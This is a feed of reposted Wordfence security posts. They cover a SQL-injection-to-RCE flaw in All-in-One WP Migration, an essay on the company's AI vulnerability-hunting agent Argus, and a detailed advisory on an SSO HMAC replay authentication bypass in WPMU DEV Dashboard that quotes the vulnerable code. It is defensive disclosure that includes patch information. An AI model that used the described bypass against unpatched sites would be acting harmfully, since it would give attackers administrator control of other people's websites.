		$params['priority'] = 10;
	}
 
	$ai1wm_params = $params;
 
	// Set job ID for per-job status tracking
	if ( isset( $params['storage'] ) ) {
		Ai1wm_Status::$job_id = $params['storage'];
	}
 
	// Set secret key
	$secret_key = null;
	if ( isset( $params['secret_key'] ) ) {
		$secret_key = trim( $params['secret_key'] );
	}
 
	ai1wm_setup_environment();
 
	try {
		// Ensure that unauthorized people cannot access import action
		ai1wm_verify_secret_key( $secret_key );</pre>
<p>Having obtained the leaked secret key, the attacker satisfies this check and drives the import pipeline with a crafted <code>.wpress</code> archive that contains a malicious must-use plugin. The plugin is extracted to the must-use plugins directory and executed on the next page load, resulting in remote code execution as the web server user.</p>
<p>As with all remote code execution vulnerabilities, this can lead to complete site compromise through the use of webshells and other techniques.</p>
<h2>Important Note</h2>
<p>We would like to draw attention to the fact that, while the attacker is unauthenticated throughout, this vulnerability requires a site administrator to perform an export followed by an import of the site after the malicious trackbacks have been planted. This export and import cycle is the action that causes the stored payload to be executed as SQL. Since backup and restore is the core purpose of this plugin, this is a routine action, but the injected SQL will not execute until it takes place.</p>
<h2>Wordfence Firewall</h2>
<p>The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.</p>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/08/all-in-one-wp-migration-sqli-firewall-howto-wordfence-firewall.png" target="_blank" rel="noopener"><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/08/all-in-one-wp-migration-sqli-firewall-howto-wordfence-firewall.png" alt="all in one wp migration sqli firewall howto wordfence firewall" width="1042" height="726" class="alignnone size-full wp-image-42926"></a></p>
<h2>Disclosure Timeline</h2>
<div>
<div>
<div>2026-08-14</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>We received the vulnerability submission</div>
<div>A security researcher submitted an unauthenticated second-order SQL injection vulnerability in All-in-One WP Migration and Backup through the Wordfence Bug Bounty Program.</div>
</div>
</div>
<div>
<div>2026-08-15</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>We validated the report and disclosed it to the vendor</div>
<div>Our team confirmed the proof of concept and sent full disclosure details to the developer through our Wordfence Vulnerability Management Portal.</div>
</div>
</div>
<div>
<div>2026-08-16</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>We deployed a firewall rule to Premium users<span>Firewall rule</span></div>
<div><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against known exploits targeting this vulnerability in All-in-One WP Migration and Backup, hosted on WordPress.org.</div>
</div>
</div>
<div>
<div>2026-08-17</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Vendor acknowledged the report</div>
<div>The developer confirmed the issue and began working on a fix.</div>
</div>
</div>
<div>
<div>2026-08-20</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Vendor released patched version 7.110<span>Patch</span></div>
<div>The vendor released the fully patched version, 7.110, of the plugin.</div>
</div>
</div>
<div>
<div>2026-09-15</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>We will deploy the firewall rule to free users<span>Firewall rule</span></div>
<div>Sites using the free version of Wordfence will receive the same protection 30 days later.</div>
</div>
</div>
</div>
<div>
  <span><i></i> Wordfence action</span><br />
  <span><i></i> Vendor / external action</span>
</div>
<h2>Conclusion</h2>
<p>In this blog post, we detailed an Unauthenticated Second-Order SQL Injection vulnerability within the <a href="https://wordpress.org/plugins/all-in-one-wp-migration/" target="_blank" rel="noopener">All-in-One WP Migration and Backup plugin</a> affecting all versions up to, and including, 7.109. This vulnerability allows unauthenticated threat actors to plant a SQL injection payload that executes when an administrator restores an archive, which can be used to leak the plugin’s secret key and ultimately achieve remote code execution, leading to complete site compromise.</p>
<p>We encourage WordPress users to verify that their sites are updated to the latest patched version of All-in-One WP Migration and Backup as soon as possible considering the critical nature of this vulnerability.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against known exploits targeting this vulnerability in All-in-One WP Migration and Backup, hosted on WordPress.org, on August 16, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later on September 15, 2026.</p>
<p>If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/09/5-million-wordpress-sites-affected-by-sql-injection-vulnerability-in-all-in-one-wp-migration-and-backup-wordpress-plugin/" target="_blank" rel="noopener">5 Million WordPress Sites Affected by SQL Injection Vulnerability in All-in-One WP Migration and Backup WordPress Plugin</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Wordfence Argus: Moving Beyond Human Research Capability</title>
		<link>https://swiftupdates.ca/wordfence-argus-moving-beyond-human-research-capability/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Thu, 27 Aug 2026 20:40:51 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-argus-moving-beyond-human-research-capability/</guid>

					<description><![CDATA[When you create an AI agent that makes a breakthrough that is so difficult to understand that you need to ask it to write a blog post to explain it to you, you know you’re on to something. If you’re paying attention, you should have noticed that the major vulnerability we recently reported in one [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>When you create an AI agent that makes a breakthrough that is so difficult to understand that you need to ask it to write a blog post to explain it to you, you know you’re on to something.</p>
<p>If you’re paying attention, you should have noticed that <a href="https://www.wordfence.com/blog/2026/08/wordfence-argus-finds-complex-6-step-critical-rce-in-avada-theme-with-1-million-sales/" target="_blank" rel="noopener">the major vulnerability we recently reported in one of the world’s most popular WordPress themes was found by an autonomous AI agent we developed called Wordfence Argus</a>. A few minutes ago we reported <a href="https://www.wordfence.com/blog/2026/08/wordfence-argus-finds-critical-authentication-bypass-in-wpmu-dev-dashboard-plugin/" target="_blank" rel="noopener">another</a>. We have made several additional breakthroughs with Argus that are working their way through the responsible disclosure process, and which we’ll publish over the coming weeks. You’re going to be hearing a lot about Wordfence Argus, which is an internal application we have developed for aggressive vulnerability hunting.</p>
<p>We have debated whether Argus is AI, a harness, or an agent, but none of those seem to apply because this kind of application includes harnesses, prompts, models, orchestration and more.</p>
<p>Wordfence Argus has given us front-row seats in the AI revolution, because it is making breakthroughs in a field in which we are world-class experts. We have the ability to fully appreciate the complexity of the research that it is conducting, and how it is beginning to exceed human capability – and far exceeds the tempo at which a human team can operate. This is incredibly exciting to see, and bodes well for challenging fields where we badly need innovation, like cancer research, which I personally provide funding for and care very much about.</p>
<p>The design approach we’ve taken with Argus and its use of LLMs is to confine, constrain, focus, motivate, parallelize, hypothesize, verify, record, prioritize, and then iterate hard and fast. I can’t go into the design details or which models we’re using or which prompt structure or harness design we use, because we are in a race with threat actors to ensure that we find the most dangerous vulnerabilities before they do.</p>
<p>And that is exactly what Argus is designed to do: to find the worlds most dangerous WordPress Vulnerabilities. More on this in the coming weeks.</p>
<p>Wordfence Argus is model agnostic, and we’re continuously evaluating different models to find the best balance of capability vs price. When a new model is released, we’re able to immediately pivot Argus to using that, in order to evaluate whether it provides improved capability. This keeps us at the forefront of AI powered cyber research.</p>
<p>Maintaining this lead is a critical success factor today for any cybersecurity organization, because attackers are gaining access to the same tools that we have access to. Innovation in vulnerability research comes from prompt engineering, harness design and task-specific model selection, along with traditional deterministic programming. Preventing malicious actors from accessing cyber-capable models is one control – but it leaves threat actors with powerful new prompts, a rapidly evolving ecosystem of open source harnesses, open-weights models without guardrails, and the many other tools emerging from the AI ecosystem.</p>
<p>Thus it is imperative that we lead in AI assisted vulnerability research and cybersecurity research. Wordfence Argus is one of the tools, along with others like Wordfence PRISM, that we’ve developed to accelerate innovation in vulnerability research, and to establish and maintain a lead ahead of threat actors.</p>
<p>I’m incredibly proud of the work our team is doing. They developed Wordfence Argus on their own, made a major research breakthrough, and kept it as a surprise for Kerry Boyte (my co-founder) and I, which they revealed in person at our suite at DEF CON this year at a big team gathering. What I’m particularly proud of is that our company has the kind of culture that enables the blue-sky research that produced Argus, without it being supervised, guided, micromanaged or interfered with. Turns out that creating a space that lets hackers hack, and getting out of the way, leads to profound breakthroughs.</p>
<p>Mark Maunder – Wordfence Founder &amp; CEO</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/08/wordfence-argus-moving-beyond-human-research-capability/" target="_blank" rel="noopener">Wordfence Argus: Moving Beyond Human Research Capability</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Wordfence Argus Finds Critical Authentication Bypass in WPMU DEV Dashboard Plugin</title>
		<link>https://swiftupdates.ca/wordfence-argus-finds-critical-authentication-bypass-in-wpmu-dev-dashboard-plugin/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Thu, 27 Aug 2026 17:56:33 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-argus-finds-critical-authentication-bypass-in-wpmu-dev-dashboard-plugin/</guid>

					<description><![CDATA[On August 19th, 2026, during internal research, I discovered an Authentication Bypass vulnerability in WPMU DEV Dashboard, a WordPress plugin with an estimated 350,000 active installations. This vulnerability makes it possible for unauthenticated attackers to gain administrator access when Hub Single-Sign On is enabled. This can lead to complete site takeover and, when an administrator-accessible [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>On August 19th, 2026, during internal research, I discovered an Authentication Bypass vulnerability in <a href="https://wpmudev.com/project/wpmu-dev-dashboard/" target="_blank" rel="noopener">WPMU DEV Dashboard</a>, a WordPress plugin with an estimated 350,000 active installations. This vulnerability makes it possible for unauthenticated attackers to gain administrator access when Hub Single-Sign On is enabled. This can lead to complete site takeover and, when an administrator-accessible code-write mechanism such as the WordPress plugin or theme editor is available, remote code execution.</p>
<p>I discovered this vulnerability with the help of <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a>, which we covered in a <a href="https://www.wordfence.com/blog/2026/08/wordfence-argus-finds-complex-6-step-critical-rce-in-avada-theme-with-1-million-sales/" target="_blank" rel="noopener">separate post</a>. Our mission is to secure WordPress through defense in depth, which is why we invest in quality vulnerability research and work closely with plugin vendors to ensure vulnerabilities are addressed before they can be widely exploited. We are committed to making the WordPress ecosystem more secure through the detection and prevention of vulnerabilities, which is a critical element of a multi-layered approach to security.</p>
<p>We provided full disclosure details to the WPMU DEV team through our <a href="https://www.wordfence.com/threat-intel/vendor/vulnerability-management-portal/" target="_blank" rel="noopener">Wordfence Vulnerability Management Portal</a> on the same day of discovery, August 19, 2026. The developer acknowledged the report and submitted a pre-release patch for review on August 21, 2026. This patch was released to the public as version 5.0.2 on August 24, 2026. We would like to commend the WPMU DEV team for their prompt response.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> customers received a firewall rule to provide protection against known exploitation techniques on August 25, 2026. Free users will get the same rule 30 days later, on September 24, 2026. <em>NOTE: The firewall rule was deployed one day after the patch was made public as it is a feature breaking rule.</em></p>
<p>We urge users of WPMU DEV Dashboard to verify that their sites are updated to the latest patched version, 5.0.2, at the time of this writing. Sites that cannot update immediately should disable Hub SSO until the patched version has been installed.</p>
<h2>Vulnerability Summary from Wordfence Intelligence</h2>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d4321c8-15a4-46f5-9b0e-2098a7fcfb5b" target="_blank" rel="noopener">WPMU DEV Dashboard &lt;= 5.0.1 &#8211; Authentication Bypass to Administrator via SSO HMAC Canonicalization Confusion</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76581" target="_blank" rel="noopener noreferrer">							CVE-2026-76581						</a>					</strong>
				</div>
<div class="affected-versions">
					<span>Affected Version(s)</span><br />
											<strong>&lt;= 5.0.1</strong>
									</div>
<div class="patched-status">
					<span>Patched Version</span><br />
					<strong class="patched">5.0.2</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpmudev-updates" target="_blank" rel="noopener">WPMU DEV Dashboard</a> <span class="wfvr-software-slug">[wpmudev-updates]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-thomas" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01c3929fe6b851d3cf7bda3c0215f691.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01c3929fe6b851d3cf7bda3c0215f691"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-thomas" target="_blank" rel="noopener">Alex Thomas</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f97767e14ecb84ebfb6efdeaad2ee129.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f97767e14ecb84ebfb6efdeaad2ee129"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a></div>
</p></div>
</p></div>
</p></div>
<div class="vulnerability-description">
			The WPMU DEV Dashboard plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 5.0.1. This is due to inconsistent and ambiguous HMAC message construction between the unauthenticated `wdpsso_step1` and `wdpsso_step2` AJAX actions, where step 1 signs and discloses an unseparated concatenation of the token, state, redirect, and domain values, while step 2 verifies an unseparated concatenation that omits the domain field. This makes it possible for unauthenticated attackers, on sites connected to WPMU DEV with Hub SSO enabled and mapped to an administrator, to obtain a valid HMAC from step 1 and replay it to step 2 by moving the domain value into the redirect field, resulting in an authenticated administrator session.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d4321c8-15a4-46f5-9b0e-2098a7fcfb5b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<h2>Technical Analysis</h2>
<p>WPMU DEV Dashboard connects WordPress sites to WPMU DEV services and provides a Hub SSO flow that allows an authorized Hub user to log in to a connected WordPress site. The flow is implemented as two AJAX actions, <code>wdpsso_step1</code> and <code>wdpsso_step2</code>.</p>
<p>Examining the code reveals that both actions are included in the <code>$nopriv_actions</code> array in the <code>WPMUDEV_Dashboard_Ajax</code> class. This makes the actions reachable by unauthenticated visitors. That exposure is necessary for the SSO flow, since the visitor is not yet authenticated to WordPress when the exchange begins, but it also means that each step must cryptographically distinguish legitimate Hub messages from values an anonymous visitor can obtain or control.</p>
<pre class="brush: php; first-line: 31; title: ; notranslate">private array $nopriv_actions
    = array(
        'wdpunauth',
        'wdpsso_step1',
        'wdpsso_step2',
    );</pre>
<p>The first action calls the <code>authenticate_sso_access_step1()</code> function. After confirming that SSO is enabled and the site is connected to WPMU DEV, the function generates a token and state value. It then creates an HMAC-SHA256 signature by concatenating the token, hashed state, redirect value, and site domain without delimiters or length prefixes.</p>
<pre class="brush: php; first-line: 2849; title: ; notranslate">$token = uniqid() . '-' . microtime( true );
WPMUDEV_Dashboard::$settings-&gt;set( 'active_token', $token, 'sso' );

// Create state session cookie.
$api_key = $this-&gt;get_key();

$pre_sso_state = uniqid( '', true );
$secure_cookie = 'https' === wp_parse_url( get_option( 'home' ), PHP_URL_SCHEME );

setcookie( 'wdp-pre-sso-state', $pre_sso_state, time() + 3600, COOKIEPATH, COOKIE_DOMAIN, $secure_cookie, true );

$hashed_pre_sso_state = hash_hmac( 'sha256', $pre_sso_state, $api_key );
// Build hmac for OAuth.
$domain  = $this-&gt;network_site_url();
$profile = $this-&gt;get_profile();

$outgoing_hmac = hash_hmac( 'sha256', $token . $hashed_pre_sso_state . $redirect . $domain, $api_key );</pre>
<p>The resulting signature is returned to the caller along with the token, hashed state, redirect, and domain as query parameters in a redirect to the WPMU DEV Hub SSO endpoint.</p>
<pre class="brush: php; first-line: 2868; title: ; notranslate">$auth_params = array(
    'domain'        =&gt; $domain,
    'hmac'          =&gt; $outgoing_hmac,
    'token'         =&gt; $token,
    'pre_sso_state' =&gt; $hashed_pre_sso_state,
    'redirect'      =&gt; $redirect,
    '_hubteam'      =&gt; $hubteam,
);</pre>
<p>The second action calls the <code>authenticate_sso_access_step2()</code> function. This function receives a signature from the Hub and independently constructs the message it expects the Hub to have signed. Unfortunately, this message is not constructed from the same set of fields used in step 1. Step 2 concatenates only the token, state, and redirect values, again without separators, and omits the domain field entirely.</p>
<pre class="brush: php; first-line: 2987; title: ; notranslate">$incoming_hmac = $sso_access_data['incoming_hmac'] ?? '';
$token         = $sso_access_data['token'] ?? '';
$pre_sso_state = $sso_access_data['pre_sso_state'] ?? '';
$redirect      = $sso_access_data['redirect'] ?? '';

$api_key        = $this-&gt;get_key();
$verifying_hmac = hash_hmac( 'sha256', $token . $pre_sso_state . $redirect, $api_key );
$redirect       = urldecode( $redirect );

$userid = WPMUDEV_Dashboard::$settings-&gt;get( 'userid', 'sso' );
$user   = $this-&gt;refresh_profile();

$is_valid = hash_equals( $incoming_hmac, $verifying_hmac );</pre>
<p>This creates an ambiguity between the two signed messages. In step 1, the signed message has the following conceptual structure:</p>
<p><code>token || state || redirect || domain</code></p>
<p>In step 2, the verified message has this structure:</p>
<p><code>token || state || redirect</code></p>
<p>Because the fields are concatenated without unambiguous boundaries, an unauthenticated attacker can request step 1 with an empty redirect value. Step 1 then signs <code>token || state || domain</code> and returns the resulting HMAC and all of the non-secret values needed to continue the exchange. The attacker can replay that same HMAC to step 2 while placing the returned domain in the step-2 redirect field. Step 2 also constructs <code>token || state || domain</code>, so the two byte strings are identical even though the domain occupies a different logical field.</p>
<p>The attacker does not need to know the WPMU DEV API key. Step 1 acts as a signing oracle and returns a valid HMAC that step 2 accepts for a different interpretation of the same concatenated bytes.</p>
<p>The remaining checks do not prevent the attack. Step 1 sets the <code>wdp-pre-sso-state</code> cookie and returns the corresponding hashed state, so the attacker can preserve the cookie and submit the returned state value. Step 1 also stores and returns the active token, allowing the attacker to satisfy the token and expiry checks with a fresh value.</p>
<pre class="brush: php; first-line: 3012; title: ; notranslate">// Check if the session cookie of the state value exists in the user's browser.
if ( isset( $_COOKIE['wdp-pre-sso-state'] ) ) {
    // Check that the state value is the same with what was passed through the endpoint.
    $hmac_state_value = hash_hmac( 'sha256', sanitize_text_field( wp_unslash( $_COOKIE['wdp-pre-sso-state'] ) ), $api_key );

    if ( hash_equals( $hmac_state_value, $pre_sso_state ) ) {

        // Check if the token has been used in the past, to prevent replay attacks.
        $previous_sso_token = WPMUDEV_Dashboard::$settings-&gt;get( 'previous_token', 'sso', 0 );
        if ( $token_timestamp_float &gt; $previous_sso_token ) {
            WPMUDEV_Dashboard::$settings-&gt;set( 'previous_token', $token_timestamp_float, 'sso' );
        } else {
            wp_die( 'The SSO token has been used in the past.' );
        }

        // Finally, check if the passed token is the same that was saved in the first place.
        $active_sso_token = WPMUDEV_Dashboard::$settings-&gt;get( 'active_token', 'sso' );
        if ( $token !== $active_sso_token ) {
            wp_die( 'The SSO token could not be verified.' );
        } else {
            WPMUDEV_Dashboard::$settings-&gt;set( 'active_token', uniqid(), 'sso' );
        }
    }
}</pre>
<p>Once these checks pass, the plugin creates an authentication cookie for the WordPress user configured for Hub SSO. On sites where SSO is mapped to an administrator, the unauthenticated attacker receives an administrator session. An administrator session generally provides complete control of a WordPress site.</p>
<pre class="brush: php; first-line: 3045; title: ; notranslate">// If everything checks out, log in the user.
wp_clear_auth_cookie();
wp_set_auth_cookie( $userid, false );
wp_set_current_user( $userid );</pre>
<p>It is important to note that this is distinct from the <a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpmudev-updates/wpmu-dev-dashboard-500-authentication-bypass-to-arbitrary-plugin-installation-remote-code-execution-via-forged-wdp-auth-hmac-on-wpmudev-hub-endpoint" target="_blank" rel="noopener">WPMU DEV Dashboard authentication bypass affecting versions up to and including 5.0.0</a> that involved empty-key <code>WDP-AUTH</code> validation. That earlier issue affected unconnected sites through the Hub remote-request path. This vulnerability affects connected sites with Hub SSO enabled, uses the two <code>wdpsso_*</code> actions, and remains exploitable in version 5.0.1 despite the protections added for the earlier issue.</p>
<h2>The Patch</h2>
<p>The vendor’s patch stores the HMAC created during step 1 in a server-side SSO setting. Step 2 validates that this stored value has the expected format and rejects the request when the incoming signature is the same signature produced by step 1. A successful legitimate SSO exchange clears the temporary value.</p>
<pre class="brush: php; first-line: 2865; title: ; notranslate">$outgoing_hmac = hash_hmac( 'sha256', $token . $hashed_pre_sso_state . $redirect . $domain, $api_key );
WPMUDEV_Dashboard::$settings-&gt;set( 'step1_hmac', $outgoing_hmac, 'sso' );</pre>
<pre class="brush: php; first-line: 2994; title: ; notranslate">$verifying_hmac = hash_hmac( 'sha256', $token . $pre_sso_state . $redirect, $api_key );
$redirect       = urldecode( $redirect );
$step1_hmac     = WPMUDEV_Dashboard::$settings-&gt;get( 'step1_hmac', 'sso', '' );

if ( ! is_string( $step1_hmac ) || 1 !== preg_match( '/A[0-9a-f]{64}z/', $step1_hmac ) ) {
    wp_die( 'Invalid SSO authentication response.' );
}

if ( hash_equals( $step1_hmac, $incoming_hmac ) ) {
    wp_die( 'Invalid SSO authentication response.' );
}</pre>
<p>We tested the reported attack against the patched build and confirmed that replaying the step-1 HMAC in step 2 was rejected without creating a <code>wordpress_logged_in</code> cookie. As a positive control, we generated the distinct HMAC expected from a legitimate Hub step-2 response and confirmed that the SSO flow still created the mapped WordPress session.</p>
<h2>Wordfence Firewall</h2>
<p>The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.</p>
<p><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/08/wpmudev-updates-auth-bypass-howto-wordfence-firewall.png" alt="wpmudev updates auth bypass howto wordfence firewall" width="1197" height="726" class="alignnone size-full wp-image-42864"></p>
<h2>Disclosure Timeline</h2>
<div>
<div>
<div>2026-08-19</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>We discovered the vulnerability</div>
<div>During internal research with Wordfence Argus, we discovered an unauthenticated authentication bypass vulnerability in WPMU DEV Dashboard.</div>
</div>
</div>
<div>
<div>2026-08-19</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>We validated the report and disclosed it to the vendor</div>
<div>Our team confirmed the proof of concept and sent full disclosure details to WPMU DEV through the Wordfence Vulnerability Management Portal.</div>
</div>
</div>
<div>
<div>2026-08-21</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Vendor acknowledged the report</div>
<div>The developer confirmed the issue and submitted a pre-release patch for review.</div>
</div>
</div>
<div>
<div>2026-08-21</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>We reviewed and approved the vendor’s pre-release patch</div>
<div>Our team confirmed that the pre-release patch blocks the reported HMAC reuse.</div>
</div>
</div>
<div>
<div>2026-08-24</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Patched version released</div>
<div>WPMU DEV released the reviewed fix to the public as version 5.0.2.</div>
</div>
</div>
<div>
<div>2026-08-25</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Wordfence Premium, Care, and Response users received a firewall rule</div>
<div>We released a firewall rule protecting Wordfence Premium, Care, and Response customers against known exploitation techniques, one day after the public patch as it is a feature breaking rule.</div>
</div>
</div>
<div>
<div>2026-09-24</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Wordfence free users receive the firewall rule</div>
<div>Sites running the free version of Wordfence receive the same firewall rule 30 days after the Premium release.</div>
</div>
</div>
</div>
<div>
    <span><i></i> Wordfence action</span><br />
    <span><i></i> Vendor / external action</span>
</div>
<h2>Conclusion</h2>
<p>In this blog post, we detailed an Unauthenticated Authentication Bypass vulnerability in <a href="https://wpmudev.com/project/wpmu-dev-dashboard/" target="_blank" rel="noopener">WPMU DEV Dashboard</a> affecting all versions up to, and including, 5.0.1. This vulnerability makes it possible for unauthenticated threat actors to reuse an HMAC returned by the first step of the Hub SSO flow in the second step by shifting the site domain into the redirect field. On connected sites where Hub SSO is enabled and mapped to an administrator, successful exploitation can lead to complete site compromise.</p>
<p>We encourage WordPress users to verify that their sites are updated to the latest patched version of WPMU DEV Dashboard, considering the critical nature of this vulnerability. Site owners who cannot update immediately should disable Hub SSO until the patch has been installed.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against known exploits targeting this vulnerability in WPMU DEV Dashboard on August 25, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later on September 24, 2026.</p>
<p>If you know someone who uses this plugin on their site, we recommend sharing this advisory with them after the coordinated disclosure embargo has ended to ensure their site remains secure, as this vulnerability poses a significant risk on connected sites with Hub SSO enabled.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/08/wordfence-argus-finds-critical-authentication-bypass-in-wpmu-dev-dashboard-plugin/" target="_blank" rel="noopener">Wordfence Argus Finds Critical Authentication Bypass in WPMU DEV Dashboard Plugin</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Wordfence Intelligence Weekly WordPress Vulnerability Report (August 17, 2026 to August 23, 2026)</title>
		<link>https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-august-17-2026-to-august-23-2026/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Thu, 27 Aug 2026 15:39:42 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-august-17-2026-to-august-23-2026/</guid>

					<description><![CDATA[Last week, there were 240 vulnerabilities disclosed in 184 WordPress Plugins and 17 WordPress Themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 105 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected. Our mission with [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Last week, there were 240 vulnerabilities disclosed in 184 WordPress Plugins and 17 WordPress Themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 105 Vulnerability Researchers that contributed to WordPress Security last week. <b>Review those vulnerabilities in this report now to ensure your site is not affected.</b></p>
<p>Our mission with Wordfence Intelligence is to make valuable vulnerability information easily accessible to everyone, like the WordPress community, so individuals and organizations alike can utilize that data<strong> to implement layered security, aligning with our overarching mission to secure WordPress with defense in depth strategies.</strong> That is why the Wordfence Intelligence <a href="https://www.wordfence.com/threat-intel/" target="_blank" rel="noopener">user interface</a>, <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability API</a>, <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a>, and <a href="https://www.wordfence.com/products/wordfence-cli/" target="_blank" rel="noopener">Wordfence CLI Vulnerability Scanner</a> are all completely free to access and utilize both personally and commercially, and why we are running this weekly vulnerability report. As the <a href="https://www.wordfence.com/blog/2025/04/wordfence-the-worlds-leading-quality-wordpress-vulnerability-intelligence-provider/" target="_blank" rel="noopener">world’s leading quality vulnerability database</a> provider for WordPress, site owners can rest assured knowing Wordfence has their back.</p>
<p>Enterprises, Hosting Providers, and even Individuals can use the <a href="https://www.wordfence.com/products/wordfence-cli/" target="_blank" rel="noopener">Wordfence CLI Vulnerability Scanner</a> to run regular vulnerability scans across the sites they protect. Or alternatively, utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability Database API</a> to receive a complete dump of our <strong>database of over 35,000 vulnerabilities</strong> and then utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a> to stay on top of the newest vulnerabilities added in real-time, as well as any updates made to the database, <strong>all for free</strong>.</p>
